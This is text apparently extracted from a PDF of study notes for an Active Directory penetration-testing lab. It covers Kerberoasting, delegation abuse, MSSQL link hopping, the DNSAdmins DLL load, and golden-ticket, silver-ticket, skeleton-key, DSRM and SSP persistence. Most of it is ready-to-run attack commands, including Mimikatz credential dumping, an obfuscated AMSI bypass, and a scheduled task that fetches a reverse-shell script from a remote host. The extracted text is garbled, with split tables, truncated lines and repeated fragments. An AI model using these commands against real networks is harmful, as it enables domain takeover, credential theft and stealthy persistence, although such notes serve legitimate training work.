986 (With SSL)
es of PS Remoting :
ne-to-One (interactive login to the machine, creds are not left unless there is
SSP or unconstrained delegation on the target machine.)
ne-to-Many

-To-One :
orks over a session called PSSession (PSSession is interactive, runs in a new process
d wsmprovhost and is a stateful session)
seful cmdlets:
New-PSSession
Enter-PSSession
nter-PSSession does not have a parameter like -FilePath to specify a script to run
otely as in the case of Invoke-Command (One-To-Many)

This session persists until the wsmprovhost

process is not killed on the remote machine or
we don't terminate the session from our side
Enter-PSSession or New-PSSession does not have a
parameter like -FilePath to specify a script to run remotely.

It is Invoke-Command that has a parameter -FilePath to

specify a script to run.

Takes script as input, converts it into a script block and

executes it as a base64 encoded script in the memory of the
target machine.
it

er-PSSession)
VOKE-MIMIKATZ

Invoke-Mimikatz uses PS Remoting cmdlet

"Invoke-Command" to perform these functions.
 - MS SQL servers are generally deployed in plenty in a Windows Domain
- SQL servers provide very good options for lateral movement as domain users can be mapped to database roles
- For MSSQL and PowerShell Hackery, let's use PowerUpSQL (https://github.com/NETSPI/PowerUpSQL)
Tool Command
PowerUpSQL Get-SQLInstanceDomain
PowerUpSQL Get-SQLConnectionTestThreaded

Get-SQLInstanceDomain | Get-
SQLConnectionTestThreaded -Verbose

PowerUpSQL Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

- A database link allows a SQL server to access external data sources like other SQL servers and OLE DB Data Sources or even
- Incase of database links between SQL servers, that is, linked SQL servers, it is possible to execute stored procedures.
- Database links work even across forest trusts.
Searching for Database Links
Tool Command
PowerUpSQL Get-SQLServerLink -Instance dcorp-mssql -Verbose
HeidiSQL select * from master..sysservers

Hopping on Database Links - (Manually)

HeidiSQL select * from openquery("dcorp-sql1", 'select * from
master..sysservers'
Hopping on Database Links - (Automated)
PowerUpSQL Get-SQLServerLinkCrawl -Instance dcorp-mssql -
Verbose
An alternative to this is to chain a series of Openquery queries to access links within links
Eg: select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt","select * from master..sysservers")')
As you can see, while doing so manually, the quotes become a huge hindrance as the links are chained more and more.

Executing commands
- On the target server, either xp_cmdshell should be already enabled
(or)
- If rpcout is enabled (disbled by default), xp_cmdshell can be enabled using:
EXECUTE('sp_configure,"xp_cmdshell",1;reconfigure;') AT "eu-sql"

PowerUpSQL Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query

"exec master..xp_cmdshell 'whoami' "
An alternative to this is to chain a series from the initial SQL server as nested link queries:
select * from openquery("dcorp-sql1", 'select * from openquery("dcorp-mgmt","select * from openquery("eu-sql", ''''select @
 Domain
s domain users can be mapped to database roles
ttps://github.com/NETSPI/PowerUpSQL)
Description Privileges
Discovery (SPN Scanning) domain user
Check Accessibility domain user

Gather Information domain user

(What are the privs on the SQL Server, version details,
etc…)
urces like other SQL servers and OLE DB Data Sources or even Excel Sheets.
QL servers, it is possible to execute stored procedures.

Description Privileges
domain user
Look for links to Remote Servers

hopping from dcorp-mssql to dcorp-sql1 using

openquery()
 hopping across database links

o access links within links

ery("dcorp-mgmt","select * from master..sysservers")')
uge hindrance as the links are chained more and more.

abled

nabled using:
eu-sql"

er as nested link queries:

("dcorp-mgmt","select * from openquery("eu-sql", ''''select @@version as version;exec master..xp_cmdshell "powershell whoami)'''')'')')
Information Obtained / Comments

Information Obtained / Comments

openquery() function can be used to run queries on a

linked database.
n;exec master..xp_cmdshell "powershell whoami)'''')'')')
Classic Kerberoast
Privilege escalation to Domain Admin using Kerberoast :
- Offline cracking of service account passwords
- The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account.
- This makes it possible to request a ticket and do offline password attack.
- Service accounts are many times ignored (passwords are rarely changed) and have privileged access.
- Password hashes of service accounts could be used to create Silver tickets.

Note :
Kerberoast is generally targeted at user accounts which are used as service accounts.

So, how do we / how does a DC find out which user accounts are used as service accounts?
- If a user accounts Service Principal Name (SPN) is NOT NULL, then the KDC assumes that user account to be used as Service

Tool Command
PowerView Get-NetUser -SPN

AD Module Get-ADUser -Filter {ServicePrincipalName -ne

"$null"} -Properties ServicePrincipalName

Once we have identified the users who's SPNs are not null, we can request the TGS for those users

PowerShell Step 1 : Add-Type -AssemblyName

System.IdentityModel
Step 2: New-Object
System.IdentityModel.Tokens.KerberosRequestorSe
curityToken -ArgumentList "MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local"

Request-SPNTicket from PowerView can also be used for cracking with John or Hashcat
PowerShell klist

Once we have TGS in memory (confirmed by klist), we can save them to disk using Mimikatz

Mimikatz (Invoke- Invoke-Mimikatz -Command ' "kerberos::list

Mimikatz) /export" '
tgsrepcrack.py python tgsrepcrack.py <wordlist> <.kirbi ticket>

Targeted Kerberoasting - (AS-REP Roasting)

- If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled, i.e, Kerberos preauth is d
- With sufficient rights (GenericWrite or GenericAll), Kerberos Preauth can be forced disabled as well.
- Very rare case, since by-default Kerberos Pre-auth is enabled.
- Some of the cases where Kerberos preauth might be disabled are when users are connecting via VPN or when Linux machin

1. Enumerating accounts with Kerberos Preauth Disabled

Tool Command
PowerView_Dev Get-DomainUser -PreauthNotRequired -Verbose
AD Module Get-ADUser -Filter {DoesNotRequirePreAuth -eq
$True} -Properties DoesNotRequirePreAuth

2. Force disbaling Kerberos PreAuth

Let's enumerate the permissions for RDPUsers on ACLs using PowerView Dev
Let's enumerate the permissions for RDPUsers on ACLs using PowerView Dev

Tool Command
PowerView_Dev Invoke-ACLScanner -ResolveGUIDs | ?
(Step 1 ) {$_.IdentityReferenceName -match "RDPUsers"}
PowerView_Dev Set-DomainObject -Identity Control1User -XOR
(Step 2) @{useraccountcontrol=4194304} -Verbose

PowerView_Dev Get-DomainUser -PreauthNotRequired -Verbose

(Step 3)

- Once the preauth disabled users are identified, we request for the encrypted AS-REP for offline brute-force (using ASREPRo

Tool Command
ASREPRoast Get-ASREPHash -UserName VPN1user -Verbose

ASREPRoast Invoke-ASREPRoast -Verbose

Targeted Kerberoasting - (Set SPN)
- With enough rights (GenericAll, GenericWrite), a target user's SPN can be set to anything (unique in the domain).
- This way, the KDC shall assume the user account to be a service account and we will be able to request a TGS for offline crac
- The SPN needs to be unique in the domain and of the format <machine_name>\<service_name>
- Note that it is not required for the machine name and service name to be valid, it just has to be unique.

Tool Command
PowerView_Dev Invoke-ACLScanner -ResolveGUIDs | ?
(Step 1 ) {$_.IdentityReferenceName -match "RDPUsers"}
PowerView_Dev Get-DomainUser -Identity support1user | select
(Step 2 ) serviceprincipalname
AD Module Get-ADUser -Identity support1user -Properties
(Step 2) ServicePrincipalName | select
ServicePrinicipalName
PowerView_Dev Set-DomainObject -Identity support1user -Set
(Step 3) @{serviceprincipalname='dcorp\whatever1'}
AD Module Set-ADUser -Identity support1user -
(Step 3) ServicePrincipalNames @{Add='dcorp\whatever1'}

PowerShell Step 1 : Add-Type -AssemblyName

(Step 4) System.IdentityModel
Step 2: New-Object
System.IdentityModel.Tokens.KerberosRequestorSe
curityToken -ArgumentList "dcorp\whatever1"

PowerShell klist
(Step 5)
Once we have TGS in memory (confirmed by klist), we can save them to disk using Mimikatz

Mimikatz (Invoke- Invoke-Mimikatz -Command ' "kerberos::list

Mimikatz) /export" '
(Step 6)
tgsrepcrack.py python tgsrepcrack.py <wordlist> <.kirbi ticket>
(Step 7)
h is encrypted with the password hash of service account.
word attack.
rely changed) and have privileged access.
e Silver tickets.

sed as service accounts.

are used as service accounts?

L, then the KDC assumes that user account to be used as Service account.

Description Privileges
Check the SPNs (if they are null or not null) of the Domain User
user accounts
Check the user accounts who's SPNs are not null Domain User

can request the TGS for those users

Request a TGS Domain User

cking with John or Hashcat

 Check if we have a TGS granted (for current user on Domain User
the service - MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local
e them to disk using Mimikatz

Export all tickets in memory onto the disk using Domain User
mimikatz
Crack the service account password Any user

Roasting)
e Kerberos preauthentication" enabled, i.e, Kerberos preauth is disabled, it is possible to grab user's crackable AS-REP and brute-force it offl
Preauth can be forced disabled as well.
d.
ed are when users are connecting via VPN or when Linux machines are connected to Active Directory.

Description Privileges

Find accounts with Kerberos Preauth Disabled Domain User

PowerView Dev
PowerView Dev

Description Privileges
Find users of RDPUsers group who have FullControl Domain User
or Write permissions
Forcefully disable Kerberos Preauth on users that we Domain User
have FullControl or Write permissions on (here,
Control1User)
To check if the Preauth is disabled Domain User

for the encrypted AS-REP for offline brute-force (using ASREPRoast tool)

Description Privileges
Request hash for a particular Kerberos Preauth Domain User
disabled user (here, VPN1user)
Enumerate all users with Kerberos Preauth disabled Domain User
and request a hash
N)
's SPN can be set to anything (unique in the domain).
vice account and we will be able to request a TGS for offline cracking.
at <machine_name>\<service_name>
ce name to be valid, it just has to be unique.

Description Privileges
Find users of RDPUsers group who have FullControl Domain User
or Write permissions

Check if the user already has a SPN Domain User

Set a SPN for the user Domain User

Request a TGS Domain User

Check if we have a TGS granted (for current user on Domain User

the service - dcorp\whatever1
e them to disk using Mimikatz

Export all tickets in memory onto the disk using Domain User
mimikatz

Crack the service account password Any user

Information Obtained / Comments
 saved as .kirbi file

is possible to grab user's crackable AS-REP and brute-force it offline.

nected to Active Directory.

Information Obtained / Comments

Information Obtained / Comments
Here, all student users belong to RDPUsers group, hence we are scanning
the ACLs of RDPUsers' members

Information Obtained / Comments

Information Obtained / Comments
Here, all student users belong to RDPUsers group, hence we are scanning
the ACLs of RDPUsers' members

Only leaves a 4769 on the DC logs

(Very silent)

saved as .kirbi file

 - Kerberos Delegation allows to "reuse the end-user credentials to access resources hosted on a different server"
- This is typically useful in multi-tier service or applications where Kerberos Double Hop is required
- For example, users authenticate to a web server and the web server makes requests to a database server. The web server c
as the user and not the web server's service account.
- Please note that, for the above example, the service account for web service must be trusted for delegation to be able to m
- Kerberos Delegation was a solution to the Kerberos Double Hop problem.
- In our above example, if the web server has unconstrained delegation on it (i.e, if the service account of the web service is t
domain as the user.

- There are two types of Kerberos Delegation:

* General/Basic or Unconstrained Delegation which allows the first hop server (web server in our example) to request ac
* Constrained delegation which allows the first hop server (web server in our example) to request access only to specifie
server, Windows offers Protocol transition to transition the request to Kerberos.

- Please note that, in both types of delegations, a mechanism is required to impersonate the incoming user and authenticate

Unconstrained Delegation
- When set for a particular service account, unconstrained delegation allows delegation to any service to any resource on the
- When unconstrained delegation is enabled, the DC places user's TGT inside TGS. When presented to the server with uncons
TGT to access any other resource as the user.
- This can be used to escalate privileges in case we can compromise the computer with unconstrained delegation and a Doma
- If we have local admin privs on the web server(say, via a compromise), then it is possible to extract the TGTs from the LSASS
web server, we may even be able to get the TGT of the Domain Admin user.
Tool Command
PowerView Get-NetComputer -UnConstrained

AD Module Get-ADComputer -Filter {TrustedForDelegation -eq

$True}
AD Module Get-ADUser -Filter {TrustedForDelegation -eq $True}

In our case, dcorp-appsrv is a machine which has unconstrained delegation enabled on it, now from dcorp-adminsrv we got
appadmin and run Find-LocalAdminAccess to see which other machines is appadmin a local admin on. And, we find that app

Once, we identify the machine where unconstrained delegation is enabled, we need to compromise those server(s)

Mimikatz (Invoke- Invoke-Mimikatz -Command ' "sekurlsa::tickets

Mimikatz) /export" '

Sometimes, there are no DA tokens on the server at that instance, so what we can do is poll for every few (say, 100) second
This can be done as follows:
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose

Mimikatz (Invoke- Invoke-Mimikatz -Command ' "sekurlsa::tickets" '

Mimikatz)

Once, we obtain a Domain Admin ticket, we can use Mimikatz to perform Pass the Ticket

Mimikatz (Invoke- Invoke-Mimikatz -Command ' "kerberos::ptt C:\Users\

Mimikatz) appadmin\Documents\[0;2ceb8b3]-2-0-60a10000-
Administrator@krbtgt-
DOLLARCORP.MONEYCORP.LOCAL.kirbi" '

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$ - To check
Constrained Delegation
- Constrained Delegation when enabled on a service account, allows access only to specified services on specified computers
- A typical scenario where constrained delegation is used - A user authenticates to a web service without using Kerberos and
- To impersonate the user, Service for User (S4U) extension is used which provides two extensions:
* Service for User to Self (S4U2self) - Allows a service to obtain a forwardable TGS to itself on behalf of a user with just t
AUTHENTICATE _FOR_DELEGATION - T2A4D UserAccountControl attribute.
* Service for User to Proxy (S4U2proxy) - Allows a service to obtain a TGS to a second service on behalf of a user. Which
attribute contains a list of SPNs to which the user token can be forwarded.

Constrained Delegation with Protocol Transition

To abuse constrained delegation in above scenario, we need to have access to the websvc account. If we have access to that a
Tool Command
PowerView (Dev) Get-DomainUser -TrustedToAuth

PowerView (Dev) Get-DomainComputer -TrustedToAuth

AD Module Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne
"$null"} -Properties msDS-AllowedToDelegateTo

Note that, in order to proceed, we need to either have the plaintext password or NTLM hash of the websvc account (require
In this case, we already have access to websvc's hash from dcorp-adminsrv
Using asktgt from kekeo, we request a TGT (steps 2 and 3 of the constrained delegation diagram)

Tool Command
kekeo tgt::ask /user:websvc
( a tool to read and /domain:dollarcorp.moneycorp.local /rc4:<websvc's
write without having hash>
admin privs)
Using s4u from Kekeo, we request a TGS (steps 4 & 5 of the constrained delegation diagram)

Tool Command
kekeo tgs::s4u /tgt:<.kirbi file received from asktgt>
( a tool to read and /user:Administrator@dollarcorp.moneycorp.local
write without having /service:cifs/dcorp-mssql.dollarcorp.moneycorp.local
admin privs)

Tool Command
Mimikatz (Invoke- Invoke-Mimikatz -Command ' "kerberos::ptt <.kirbi
Mimikatz) TGS file>" '
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$

- Another interesting issue in Kerberos is that the delegation occurs not only for the specified service, but for any service run
- This is huge, as it allows access to many interesting services (like LDAP) when the delegation may be for a non-intrusive serv
kekeo tgt::ask /user:dcorp-adminsrv
( a tool to read and /domain:dollarcorp.moneycorp.local /rc4:<adminsrv's
write without having hash>
admin privs)

kekeo tgs::s4u /tgt:<.kirbi file received from asktgt>

( a tool to read and /user:Administrator@dollarcorp.moneycorp.local
write without having /service:time/dcorp-dc.dollarcorp.moneycorp.local|
admin privs) ldap/dcorp-dc.dollarcorp.moneycorp.local

Mimikatz (Invoke- Invoke-Mimikatz -Command ' "kerberos::ptt <.kirbi

Mimikatz) TGS of LDAP file>" '
Mimikatz (Invoke- Invoke-Mimikatz -Command ' "lsadump::dcsync
Mimikatz) /user:dcorp\krbtgt" '
 o access resources hosted on a different server"
e Kerberos Double Hop is required
erver makes requests to a database server. The web server can request access to resources (all or some resources depending on the type

r web service must be trusted for delegation to be able to make requests as a user.
p problem.
egation on it (i.e, if the service account of the web service is trusted for delegation), then it can impersonate the user that has authenticate

he first hop server (web server in our example) to request access to any service on any computer in the domain.
web server in our example) to request access only to specified services on specified computers. If the user is not using Kerberos authentic
st to Kerberos.

equired to impersonate the incoming user and authenticate to the second hop server (Database server in our example) as the user.

ation allows delegation to any service to any resource on the domain as a user.
s TGT inside TGS. When presented to the server with unconstrained delegation, the TGT is extracted from the TGS and stored in LSASS. Th

ise the computer with unconstrained delegation and a Domain Admin connects to that machine.
omise), then it is possible to extract the TGTs from the LSASS process. And, moreover, if high value targets like DAs authenticate to the we
dmin user.
 Description Privileges

Discover Domain computers which have

Domain User
unconstrained delegation enabled

Discover Domain user accounts which have Domain User

unconstrained delegation enabled

delegation enabled on it, now from dcorp-adminsrv we got access to 'appadmin' user. So, we spawn a powershell process with the priv
achines is appadmin a local admin on. And, we find that appadmin is a local admin on dcorp-appsrv (machine with unconstrained deleg

is enabled, we need to compromise those server(s)

To check the current tokens and save the tickets to local admin privs
the disk
check if any DA tokens are available

e, so what we can do is poll for every few (say, 100) seconds and check if an Administrator( or DA ) Token is obtained on the server.

rName Administrator -Delay 5 -Verbose

To check the current tokens local admin privs

check if any DA tokens are available

perform Pass the Ticket

To re-use the DA token (Pass the Ticket) local admin privs

(injecting the DA token in memory of the powershell
process)
ows access only to specified services on specified computers as a user.
r authenticates to a web service without using Kerberos and the web service makes requests to a database server to fetch results based o
ed which provides two extensions:
ain a forwardable TGS to itself on behalf of a user with just the user principal name without supplying a password. The service account mu
attribute.
obtain a TGS to a second service on behalf of a user. Which second service? This is controlled by msDS-AllowedToDelegateTo attribute o
rwarded.

col Transition

ave access to the websvc account. If we have access to that account, it is possible to access the services listed in msDS-AllowedToDelegate
 Description Privileges
Discover Domain user accounts which have Domain User
constrained delegation enabled

Discover Domain computers which have constrained

Domain User
delegation enabled

ext password or NTLM hash of the websvc account (required)

p-adminsrv
constrained delegation diagram)

Description Privileges
we request a TGT Domain user
trained delegation diagram)

Description Privileges
we request a TGS domain user

Description Privileges
Loading TGS obtained into the current session domain user

urs not only for the specified service, but for any service running under the same account. There is no validation for the SPN specified.
e LDAP) when the delegation may be for a non-intrusive service!
we request a TGT Domain user

we request a TGS domain user

(for TIME - which is a msDS-DelegatedToAllowedTo
listing AND LDAP - which is not a listing

Loading TGS obtained into the current session domain user

Perform DCSync to dump domain secrets Domain user

s to resources (all or some resources depending on the type of delegation) on the database server

user.

tion), then it can impersonate the user that has authenticated to it and access ANY service in the

e on any computer in the domain.

cified computers. If the user is not using Kerberos authentication to authenticate to the first hop

p server (Database server in our example) as the user.

.
n, the TGT is extracted from the TGS and stored in LSASS. This way the server can re-use the user's

ts to that machine.
oreover, if high value targets like DAs authenticate to the web server, then as a local admin on the
 Information Obtained / Comments

Note that, always the DC will come in the results of

machines which have unconstrained delegation,
ignore the DCs and look for other machines.

min' user. So, we spawn a powershell process with the privs of

admin on dcorp-appsrv (machine with unconstrained delegation)

Administrator( or DA ) Token is obtained on the server.

makes requests to a database server to fetch results based on the user's authorization.

name without supplying a password. The service account must have the TRUSTED_TO

This is controlled by msDS-AllowedToDelegateTo attribute of the (first) service account. This

ble to access the services listed in msDS-AllowedToDelegateTo of the websvc account as ANY user.
Information Obtained / Comments

Information Obtained / Comments

getting a TGT is equivalent to having local admin privs
on the service account
 Information Obtained / Comments
/user = user to be impersonated
/service = the service listed in msDS-
AllowedToDelegateTo for which we request the TGS.

Information Obtained / Comments

ame account. There is no validation for the SPN specified.

getting a TGT is equivalent to having local admin privs
on the service account

/user = user to be impersonated

/service = the service listed in msDS-
AllowedToDelegateTo for which we request the TGS.

impersonating a DA and querying the DC using LDAP

 - It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM)
- Incase the DC also serves as DNS, this will provide us escalation to DA.
- Also, to abuse this the DNSAdmins group need privileges to restart the DNS service. (by-default, the DNSAdmins are not giv

Reference articles:
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83#:~:text=In%20ad
http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html#:~:tex

Tool Command
PowerView Get-NetGroupMember -GroupName "DNSAdmins"
AD Module Get-ADGroupMember -Identity DNSAdmins

Once, we know the members of the DNSAdmins group, we need to compromise a member.
We already have the hash of srvadmin (in this case), because of derivative local admin.
(Invoke-Mimikatz -Command ' "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:<hash> /run:powe

From the privs of DNSAdmins group member, configure DLL using dnscmd.exe (needs RSAT DNS):
Tool Command
Method 1: dnscmd dcorp-dc /config /serverlevelplugindll \\
dnscmd.exe 172.16.50.100\dll\mimilib.dll
Method 2: Step 1:
DNSServer module $dnsettings = Get-DnsServerSetting -ComputerName
dcorp-dc -Verbose -All
Step 2:
$dnsettings.ServerLevelPluginDll = "\\172.16.50.100\
dll\mimilib.dll"
Step 3:
Set-DnsServerSetting -InputObject $dnsettings -
ComputerName dcorp-dc -Verbose

Next, we need to restart the service.

This can be done using sc in cmd prompt
Next, we need to restart the service.
This can be done using sc in cmd prompt

Tool Command
cmd prompt sc \\dcorp-dc stop dns
cmd prompt sc \\dcorp-dc start dns

If the DLL injection is successful (injecting mimilib.dll into the DNS service), then a file name 'kiwidns.log' is created and stor
All the requests sent to the domain's DNS server gets logged in kiwidns.log file.
bitrary DLL with the privileges of dns.exe (SYSTEM)
o DA.
rt the DNS service. (by-default, the DNSAdmins are not given privs to restart the DNS service)

c-compromise-in-one-line-a0f779b8dc83#:~:text=In%20addition%20to%20implementing%20their,integration%20with%20Active%20Dire
mins-privilege-for-escalation-in-active-directory.html#:~:text=Feature%20abuses%20are%20as%20lethal,privileges%20on%20the%20DNS%

Description Privileges

Enumerate the members of the DNSAdmins group Domain User

o compromise a member.
erivative local admin.
main:dollarcorp.moneycorp.local /ntlm:<hash> /run:powershell.exe" ')

dnscmd.exe (needs RSAT DNS):

Description Privileges
configuring DLL using dnscmd.exe needs RSAT DNS

configuring DLL using DNSServer Module needs RSAT DNS

 Description Privileges
stops the dns service DNSAdmins privs
starts the dns service DNSAdmins privs

service), then a file name 'kiwidns.log' is created and stored in System32 folder.
widns.log file.
he DNS service)

plementing%20their,integration%20with%20Active%20Directory%20domains.
ses%20are%20as%20lethal,privileges%20on%20the%20DNS%20server.

Information Obtained / Comments

Information Obtained / Comments

give read/write permission to everyone for the folder (in this
case - dll folder)
 Information Obtained / Comments

der.
- NTLM password hash uses Kerberos RC4 for encryption
- Logon Ticket (TGT) provides user auth to DC
- Kerberos policy is only checked when the TGT is created
- DC validates user account only when TGT > 20 mins
- Service Ticket(TGS) PAC validation is optional and rare
- Server LSASS sends PAC Validation request to DCs netlogon service
- If it runs as service, PAC validation is optional
- If a service runs as SYSTEM, it performs server signature verification on the PAC (computer account long-term key)

PERSISTENCE - GOLDEN TICKET

- A golden ticket is signed and encrypted by the hash of krbtgt user account which makes it a valid TGT ticket
- Since user account validation is not done by DC till TGT > 20 mins, we can use even deleted/revoked accounts
- The krbtgt user hash could be used to impersonate any user with any privileges from even a non-domain machine
- Password change has no effect on this attack.
- Golden Ticket attack can be performed without any domain privs or local admin privs and even from a non domain joined m
Tool Command
AMSI Bypass sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}
{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -
VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`
etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}
{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},$
{t`RuE} )

Mimikatz Invoke-Mimikatz -Command ' "lsadump::lsa /patch" ' -

(Invoke- ComputerName dcorp-dc.dollarcorp.moneycorp.local
Mimikatz)
Mimikatz Invoke-Mimikatz -Command ' "kerberos::golden
(Invoke- /User:Administrator /domain:dollarcorp.moneycorp.local
Mimikatz) /sid:S-1-5-21-268341927-4156871508-1792461683
/krbtgt:a9b30e5b0dc865eadcea9411e4ade72d id:500
/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"
'

PowerShell klist
PowerShell ls \\dcorp-dc.dollarcorp.moneycorp.local\c$

Mimikatz Invoke-Mimikatz -Command ' "lsadump::dcsync /user:dcorp\

(Invoke- krbtgt" '
Mimikatz)

PERSISTENCE - SILVER TICKET

- In case of golden ticket, the feature (or the trust) abused was that the DC validates the NTLM hash of the krbtgt account wh
- In case of silver ticket, the feature (or the trust) abused is that the application server validates the NTLM hash of the service
- So in silver ticket, we try to extract the hash of the service account, so that we can access the service as any user (incl. as hig
- Silver ticket is a valid TGS (Golden ticket is a valid TGT), encrypted and signed by the NTLM hash of the service account (Gold
- Services rarely check PAC (Privileged Access certificate)
- Services will allow access only to the services themselves
- Reasonable persistence period (default : 30 days for computer accounts)
- All the intersting services in a domain (cifs, host, RPCSS, WSMAN, etc...) use the machine accounts as the service accounts, h
- We will use mimikatz to dump the machine account hash for the DC.

Tool Command
Mimikatz Invoke-Mimikatz -Command ' "lsadump::lsa /patch" ' -
(Invoke- ComputerName dcorp-dc.dollarcorp.moneycorp.local
Mimikatz)
Mimikatz Invoke-Mimikatz -Command ' "kerberos::golden
(Invoke- /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-
Mimikatz) 268341927-4156871508-1792461683 /target:dcorp-
dc.dollarcorp.moneycorp.local /service:CIFS
/rc4:6f5b5acaf7433b3282ac22e21e62ff22
/user:Administrator /ptt" '

- The above command can be used for any other service on a machine as well, such as HOST, RPCSS, WSMAN and many more
(https://adsecurity.org/?page_id=183) --> List of services and their SPNs

- There are various ways of achieving command execution using silver tickets.
- Creating a silver ticket for the HOST SPN which will allow us to schedule a task on the target:
Invoke-Mimikatz -Command ' "kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-415687150
/rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt" '

- First, check whether it is possible to list the tasks on the DC:

schtasks /S dcorp-dc.dollarcorp.moneycorp.local

- Schedule and execute a task (HOST SPN allows us to schedule tasks on the DC) :
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powe
'http://192.168.100.1:8080/Invoke-PowerShellTcp.ps1' ' ')' "

Here, we have created a task to fetch a reverse shell with the NT Authority\SYSTEM privs and the name of the task is "STCheck

- Now, let's run the task that we have created

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"

PERSISTENCE - SKELETON KEY

- Skeleton key is a persistence technique where it is possible to patch a domain controller (lsass process) so that it allows acc
- The attack was discovered by Dell SecureWorks used in a malware named the skeleton key malware.
- All the publicly known methods are NOT persistent across reboots.
- Yet again, mimikatz to the rescue!!!
 - Skeleton key is a persistence technique where it is possible to patch a domain controller (lsass process) so that it allows acc
- The attack was discovered by Dell SecureWorks used in a malware named the skeleton key malware.
- All the publicly known methods are NOT persistent across reboots.
- Yet again, mimikatz to the rescue!!!

Tool Command
Mimikatz Invoke-Mimikatz -Command ' "privilege::debug"
(Invoke- "misc::skeleton" ' -ComputerName dcorp-
Mimikatz) dc.dollarcorp.moneycorp.local

- Now it is possible to access any machine with a valid username and password as "mimikatz"
Enter-PSSession -ComputerName dcorp-dc -credential dcorp\Administrator
This prompts a window asking for the password ("mimikatz")

- In case lsass is running as a protected process, we can still use the skeleton key, but it needs the mimikatz driver (mimidriv.s
mimikatz# privilege::debug
mimikatz# !+
mimikatz# !processprotect /process:lsass.exe /remove
mimikatz# misc::skeleton
mimikatz# !-

- Note that above would be very noisy in logs - Service installation(Kernel mode driver)

PERSISTENCE - DSRM
- DSRM is Directory Services Restore Mode
- There is a local administrator on every DC called "Administrator" whose password is the DSRM password. (Note that this is
- DSRM password (SafeModePassword) is required when a server is promoted to Domain Controller and it is rarely changed.
- After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC.
- DSRM password is used for the purpose of rebooting DC in a SafeMode

Tool Command
Mimikatz Invoke-Mimikatz -Command ' "token::elevate"
(Invoke- "lsadump::sam" ' -ComputerName dcorp-dc
Mimikatz)

- Since DSRM password is of the local administrator of the DC, we can pass the hash to authenticate.
- But, the logon behaviour for the DSRM account needs to be changed before we can use it's hash.
This is done as follows :
Step 1 Enter-PSSession -Computername dcorp-dc
Step 2 New-ItemProperty "HKLM:\System\CurrentControlSet\
Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -
PropertyType DWORD

Step 2 Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\

Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2

Step 3 Get-ItemProperty "HKLM:\System\CurrentControlSet\

Control\Lsa\"
Now,we want our DA privileges back after (say 6 months), then we can always run the following command , since we have t
Invoke-Mimikatz -Command ' "sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:<hash_of_DSRM> /run:powershe

ls \\dcorp-dc\C$

Note :
1. to run this, disable realtimemonitoring
2. run the powershell session as local admin (very important to note)

PERSISTENCE - Custom SSP

- A security support provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Som
* NTLM
* Kerberos
* Wdigest
* CredSSP
- Mimikatz provides a custom SSP - mimilib.dll
- This SSP logs local logons, service account and machine account passwords in clear text on the target server.

Method 1
Drop the mimilib.d11 to system32 of the DC, then
Add mimilib to registry key - HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages :

(PowerShell code)

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | selec

$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -value $packages

And reboot the DC.

Method 2
Using Mimikatz, inject into LSASS (Not stable with server 2016) :

Invoke-Mimikatz -Command ' "misc::memssp" '

(No reboot required)
All local logons on the DC are logged to :
C:\Windows\system32\kiwissp.log

It is possible to modify the code to create this file (kiwissp.log) in the sysvol folder (which is accessible by every machine in the

PERSISTENCE using ACLs - AdminSDHolder

- AdminSDHolder is a container that resides in the system container of the domain and used to control the permissions (using
- Security Descriptor Propagator (SDPROP) process runs every hour and compares the ACL of the protected groups and mem
- Protected Groups :
Account Operators, Backup Operators, Server Operators, Print Operators, Domain Admins, Replicator, Enterprise Admins,

- Why are these groups called Protected Groups?

* Account Operators - Cannot modify domain admins, Enterprise Admins or Built-in Admins, but can modify the nested grou
* Backup Operators - Backup GPO, edit to add SID of a controlled account to a privileged group and Restore.
* Server Operators - Run a command as SYSTEM on DC (using the disabled Browser service)
* Print Operators - Copy ntds.dit backup, load device drivers

- Well-known abuse of some of the Protected Groups are as mentioned above. All the above protected groups can log on loc
